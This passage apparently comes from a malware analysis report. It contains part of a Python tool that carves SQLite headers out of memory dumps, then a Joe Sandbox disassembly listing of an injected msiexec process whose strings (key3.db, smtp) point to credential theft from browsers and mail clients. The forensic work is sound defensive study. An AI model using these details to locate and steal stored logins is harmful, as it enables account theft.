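        raise ValueError("not an SQLite 3 database (magic mismatch)")
    if data[21:24] != PAYLOAD_FRACTIONS:
        raise ValueError("unsupported payload fractions at offset 21")
    # Page size is big-endian at 16..17; the value 1 encodes 65536.
    page_size = struct.unpack(">H", data[16:18])[0]
    if page_size == 1:
        page_size = 65536
    if page_size < 512 or page_size > 65536 or page_size & (page_size - 1):
        raise ValueError(f"invalid page size {page_size}")
    write_version, read_version = data[18], data[19]   # 1 = rollback journal, 2 = WAL
    if read_version > 2:
        raise ValueError("read version newer than supported")
    change_counter, n_pages = struct.unpack(">II", data[24:32])
    return {
        "page_size": page_size,
        "write_version": write_version,
        "read_version": read_version,
        "change_counter": change_counter,
        "pages": n_pages,
        "sqlite_version": struct.unpack(">I", data[96:100])[0],  # SQLITE_VERSION_NUMBER of last writer
    }


def carve_sqlite(blob: bytes) -> list:
    """Find every offset in blob that carries a header which passes the checks above.
    Bare occurrences of the magic string (e.g. the constant inside the library's own
    code, as in the dump this report describes) fail validation and are skipped."""
    hits = []
    pos = blob.find(SQLITE_MAGIC)
    while pos != -1:
        try:
            hits.append((pos, parse_sqlite_header(blob[pos:pos + 100])))
        except ValueError:
            pass
        pos = blob.find(SQLITE_MAGIC, pos + 1)
    return hits


def make_header(page_size: int = 4096, pages: int = 3, wal: bool = False,
                sqlite_version: int = 3045001) -> bytes:
    """Constructed test input: build a minimal but valid 100-byte header."""
    hdr = bytearray(100)
    hdr[0:16] = SQLITE_MAGIC
    struct.pack_into(">H", hdr, 16, 1 if page_size == 65536 else page_size)
    hdr[18] = hdr[19] = 2 if wal else 1
    hdr[21:24] = PAYLOAD_FRACTIONS
    struct.pack_into(">II", hdr, 24, 7, pages)
    struct.pack_into(">I", hdr, 96, sqlite_version)
    return bytes(hdr)


if __name__ == "__main__":
    # Constructed "memory dump": padding, one database, the bare magic string as it would
    # appear inside code, more padding, a second (WAL-mode) database.
    dump = b"\x00" * 37 + make_header() + SQLITE_MAGIC + b"junk" * 50 + make_header(65536, 10, wal=True)
    for offset, info in carve_sqlite(dump):
        print(f"0x{offset:08x}: page_size={info['page_size']} pages={info['pages']} "
              f"wal={info['write_version'] == 2}")
```

When run over a real dump, a hit whose page count times page size is far larger than the remaining bytes usually means the file was only partially resident; carving the visible pages is still worthwhile because browser login and history tables often sit in the first few pages.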
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memset
                                                                    • String ID: winWrite1$winWrite2
                                                                    • API String ID: 438689982-3457389245
                                                                    • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                    • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                    • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                    • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpymemset
                                                                    • String ID: winRead
                                                                    • API String ID: 1297977491-2759563040
                                                                    • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                    • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                    • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                    • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0044955B
                                                                    • memset.MSVCRT ref: 0044956B
                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpymemset
                                                                    • String ID: gj
                                                                    • API String ID: 1297977491-4203073231
                                                                    • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                    • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                    • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                    • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                    APIs
                                                                    • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                    • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                    • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                    • GetLastError.KERNEL32 ref: 0040C1CA
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Temp$ClipboardDirectoryErrorFileLastNameOpenPathWindows
                                                                    • String ID:
                                                                    • API String ID: 1189762176-0
                                                                    • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                    • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                    • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                    • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                    APIs
                                                                    • GetParent.USER32(?), ref: 004090C2
                                                                    • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                    • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                    • String ID:
                                                                    • API String ID: 4247780290-0
                                                                    • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                    • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                    • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                    • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                    APIs
                                                                    • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                                                      • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                                                      • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                                                    • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                                                      • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                                                      • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                                                      • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                                                      • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                    • SetCursor.USER32(?,?,0040CBD2), ref: 0040B9F9
                                                                    • SetFocus.USER32(?,?,?,0040CBD2), ref: 0040BA0B
                                                                    • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                    • String ID:
                                                                    • API String ID: 2374668499-0
                                                                    • Opcode ID: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                                    • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                                                                    • Opcode Fuzzy Hash: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                                    • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID:
                                                                    • API String ID: 613200358-0
                                                                    • Opcode ID: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
                                                                    • Instruction ID: b8efe39ffa321d4f2ce8ce974eba3160cbf96dc633dc1e2aadb4e529a4dc2577
                                                                    • Opcode Fuzzy Hash: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
                                                                    • Instruction Fuzzy Hash: A9F0F4726057855BD7209F6999C1A57F7D9BB98714791083FF189F3A81CB38FC404A18
                                                                    APIs
                                                                      • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                      • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                      • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                      • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                      • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AB3
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AC6
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AD9
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AEC
                                                                    • free.MSVCRT ref: 00409B00
                                                                      • Part of subcall function 00407A55: free.MSVCRT ref: 00407A5C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$free
                                                                    • String ID:
                                                                    • API String ID: 2241099983-0
                                                                    • Opcode ID: 31fdcc5134ad351e7c18f58886b056bef117553105c5edd8e205bd7bfa1d52a3
                                                                    • Instruction ID: 0e1833da384361268bbd99a4020487bffb4c29eeff2b5ca4c2d3cb4a232d8152
                                                                    • Opcode Fuzzy Hash: 31fdcc5134ad351e7c18f58886b056bef117553105c5edd8e205bd7bfa1d52a3
                                                                    • Instruction Fuzzy Hash: 3FF0A932F068B05BC2117B669002B0EB398AD81B2831A016FF8147B6D2CB3CBC504ADE
                                                                    APIs
                                                                      • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                      • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                      • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                    • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                    • GetSysColor.USER32(00000005), ref: 004107A6
                                                                    • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                    • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                    • String ID:
                                                                    • API String ID: 2775283111-0
                                                                    • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                    • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                                    • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                    • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                    • API String ID: 885266447-2471937615
                                                                    • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                    • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                                                                    • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                    • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                                                                    APIs
                                                                    • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                                                                    • CloseHandle.KERNEL32(?,?,00406C55,00000000,?,00000000,?), ref: 00406B11
                                                                      • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407909
                                                                      • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407917
                                                                      • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: File$??2@??3@CloseHandleReadSize
                                                                    • String ID: Ul@$key3.db
                                                                    • API String ID: 3013762397-1563549157
                                                                    • Opcode ID: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                    • Instruction ID: 1a03c8060d8a16f0d136589656c0636480a797a3ae37aee6ed6b4138e5904ac9
                                                                    • Opcode Fuzzy Hash: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                    • Instruction Fuzzy Hash: EA1181B1D00624ABCB10AF25DC8588E7FB5EF45364B15C177F80AEB291D638ED61CB98
                                                                    APIs
                                                                    • _strcmpi.MSVCRT ref: 0040E134
                                                                    • _strcmpi.MSVCRT ref: 0040E14D
                                                                    • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _strcmpi$_mbscpy
                                                                    • String ID: smtp
                                                                    • API String ID: 2625860049-60245459
                                                                    • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                    • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                    • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                    • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040C28C
                                                                    • SetFocus.USER32(?,?), ref: 0040C314
                                                                      • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FocusMessagePostmemset
                                                                    • String ID: S_@$l
                                                                    • API String ID: 3436799508-4018740455
                                                                    • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                    • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                    • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                    • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004092C0
                                                                    • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                    • _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                    Strings
                                                                    • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfileString_mbscpymemset
                                                                    • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                                    • API String ID: 408644273-3424043681
                                                                    • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                    • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                                    • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                    • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _mbscpy
                                                                    • String ID: C^@$X$ini
                                                                    • API String ID: 714388716-917056472
                                                                    • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                    • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                    • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                    • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                    APIs
                                                                      • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                      • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                                    • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                    • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                    • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                    • String ID: MS Sans Serif
                                                                    • API String ID: 3492281209-168460110
                                                                    • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                    • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                    • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                    • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ClassName_strcmpimemset
                                                                    • String ID: edit
                                                                    • API String ID: 275601554-2167791130
                                                                    • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                    • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                    • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                    • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: strlen$_mbscat
                                                                    • String ID: 3CD
                                                                    • API String ID: 3951308622-1938365332
                                                                    • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                    • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                    • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                    • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID: rows deleted
                                                                    • API String ID: 2221118986-571615504
                                                                    • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                    • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                    • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                    • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                    APIs
                                                                      • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@$memset
                                                                    • String ID:
                                                                    • API String ID: 1860491036-0
                                                                    • Opcode ID: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                                    • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                    • Opcode Fuzzy Hash: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                                    • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004048C2
                                                                    • memset.MSVCRT ref: 004048D6
                                                                    • memset.MSVCRT ref: 004048EA
                                                                    • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                    • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$memcpy
                                                                    • String ID:
                                                                    • API String ID: 368790112-0
                                                                    • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                    • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                                                    • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                    • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040D2C2
                                                                    • memset.MSVCRT ref: 0040D2D8
                                                                    • memset.MSVCRT ref: 0040D2EA
                                                                    • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                    • memset.MSVCRT ref: 0040D319
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
